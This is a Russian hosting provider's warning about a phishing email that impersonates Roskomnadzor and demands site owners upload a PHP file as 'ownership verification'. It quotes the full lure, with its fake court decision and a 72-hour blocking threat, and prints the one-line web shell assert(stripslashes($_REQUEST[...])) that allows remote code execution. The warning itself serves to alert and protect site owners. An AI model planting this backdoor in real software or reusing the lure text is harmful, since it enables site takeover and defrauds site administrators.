Внимание владельцам сайтов: это не Роскомнадзор
Роскомнадзор — Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций. Эта организация занимается в частности контролем и надзором в сфере средств массовой информации, в том числе электронных, и массовых коммуникаций, информационных технологий и связи, что относится и к сайтам.
Накануне многие пользователи получили письмо от zapret-info@roskomnadzor.org с требованиями о внесении изменении в код сайта якобы для подтверждения принадлежности.
Домен отправителя roskomnadzor.org переадресует на сайт Роскомнадзора, тем не менее, сам домен зарегистрирован на неизвестное лицо 19 августа этого года, а перенаправление осуществляется путём редиректа. К официальным ресурсам этот домен никакого отношения не имеет. Впрочем, при отправке можно указать любой почтовый адрес отправителя, даже в реально существующем домене государственной организации. Поэтому к письмам по электронной почте, не содержащим достоверной электронно-цифровой подписи надо относиться с осторожностью.
В письме есть требование разместить PHP-код
assert(stripslashes($_REQUEST[roskomnadzor]));
Функция assert() выполнит PHP-код, переданный в адресной строке при вызове скрипта. Другими словами злоумышленник таким образом получает возможность на практически любые действия с вашей площадкой сайта. Разумеется, это обманное письмо, фейк, и подобные требования ни в коем случае выполнять нельзя.
В случае, если у вас есть сомнения относительно сообщений, касающихся вашего сайта на хостинге, пожалуйста, свяжитесь с нами и не совершайте необдуманных действий.
Приводим текст письма.
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени *** в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт *** был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени ***, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php,
содержащий следующий текст:
< ?php
/*Подтверждение доменного имени *** */
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между <
и ?php
Путь до файла на Вашем сайте должен получиться следующий: ***/reestr/reestr-id128032.php
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И
МАССОВЫХ КОММУНИКАЦИЙ.
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ***, следую инструкции указанной выше, то Ваш сайт *** будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------